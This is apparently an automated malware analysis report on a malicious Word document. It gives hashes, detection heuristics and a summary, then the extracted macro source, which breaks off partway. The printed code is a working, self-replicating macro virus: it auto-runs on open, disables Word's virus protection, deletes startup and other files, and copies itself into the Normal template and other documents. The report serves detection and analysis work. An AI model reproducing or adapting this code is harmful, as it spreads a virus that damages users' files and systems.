Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e67ddb3ae666cf0…

MALICIOUS

Office (OLE)

41.0 KB Created: 2004-07-20 12:55:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 3be6a329b6ca474561add54c52dd7e28 SHA-1: ee0d23b4b57dbbbb6c2c6ab0608e08ad27df9f7e SHA-256: 1e67ddb3ae666cf051e1a44726528dcc971c8f45d31b13b93eea905c3b179133
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macros that attempt to disable security features and delete various files, including startup entries and temporary files. The presence of an AutoOpen macro and the ClamAV detection strongly indicate malicious intent. The script's primary function appears to be system preparation, likely for a secondary payload, though the full execution chain is not visible.

Heuristics 4

  • ClamAV: Doc.Virus.Diperis-6922877-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Virus.Diperis-6922877-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4296 bytes
SHA-256: 5d6dedbc8f10e79014ab9ad1465e5c733a9172732cdd98ad95001ef90878d194
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Word97"

Sub WAntidot()
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
    CommandBars.ActiveMenuBar.Enabled = True
    CommandBars("Control Toolbox").Enabled = True
    CommandBars("Forms").Enabled = True
    CommandBars("ActiveX Control").Enabled = True
    CommandBars("Visual Basic").Enabled = True
    On Error Resume Next
    Kill "C:\Program Files\Microsoft Office\Office\StartUp\*.dot"
    Kill "C:\WINDOWS\FAQ.doc"
    Kill "C:\WINDOWS\Application Data\Microsoft\Excel\XLSTART\excel2r.xls"
    Kill "C:\Program Files\Microsoft Office\Office\XLStart\excel2r.xls"
    Kill "C:\windows.reg"
    Kill "C:\fix.bat"
    Kill "C:\sex.txt.vbs"
A2N
z = 0
p = MsgBox("File diperiksa : " + ActiveDocument.Name + " !")
On Error Resume Next
For Each obj In ActiveDocument.VBProject.VBComponents
           z = z + 1
     If obj.Name = "Word97" Or obj.Name = "ThisDocument" Then
     GoTo lompat
     End If
            Set mok = ActiveDocument.VBProject.VBComponents.Item(z)
            xx = mok.CodeModule.CountOfLines
            xy = Int(xx / 25) + 1
            x = 0
            xyz = 1
            p = MsgBox("Ditemukan macro : " + obj.Name + " !")
            While x < xy
            xad1 = mok.CodeModule.Lines(xyz, 25)
            x = x + 1
            xyz = xyz + 25
            Wend
            ActiveDocument.VBProject.VBComponents(z).export "c:\my documents\" & obj.Name & "m2r.txt"
            ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(obj.Name)
lompat:
 Next obj
    On Error Resume Next
    For Each obj In NormalTemplate.VBProject.VBComponents
        If obj.Name <> "Word97" And obj.Name <> "ThisDocument" Then
            NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(obj.Name)
        End If
    Next obj
    p = MsgBox("File : " + ActiveDocument.Name + " bebas dari macro !")
End Sub
Sub FileOpen()
    WordBasic.DisableAutoMacros True
    On Error Resume Next
    If Dialogs(wdDialogFileOpen).Show <> 0 Then
    WAntidot
    End If
    N2A
    WordBasic.DisableAutoMacros False
End Sub
Sub AutoOpen()
    WordBasic.DisableAutoMacros True
    On Error Resume Next
    A2N
    WAntidot
    N2A
    WordBasic.DisableAutoMacros False
End Sub
Sub A2N()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = ActiveDocument
Set Target = NormalTemplate
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = "Word97" Then sehat = True
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objKorban = True
            End If
            Next obj
      If sehat = False Then
    x = Infect(Sumber, Target, "Word97")
    End If
    On Error Resume Next
    NormalTemplate.Save
End Sub

Function Infect(Sumber, Target, obj As String) As Boolean
On Error GoTo ILari
    Sumber.VBProject.VBComponents(obj).export TempPath & obj
    Target.VBProject.VBComponents.Import TempPath & obj
    Infect = True
    Kill TempPath & obj
Exit Function
ILari:
End Function

Sub N2A()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = NormalTemplate
Set Target = ActiveDocument
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = "Word97" Then sehat = True
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objK
... (truncated)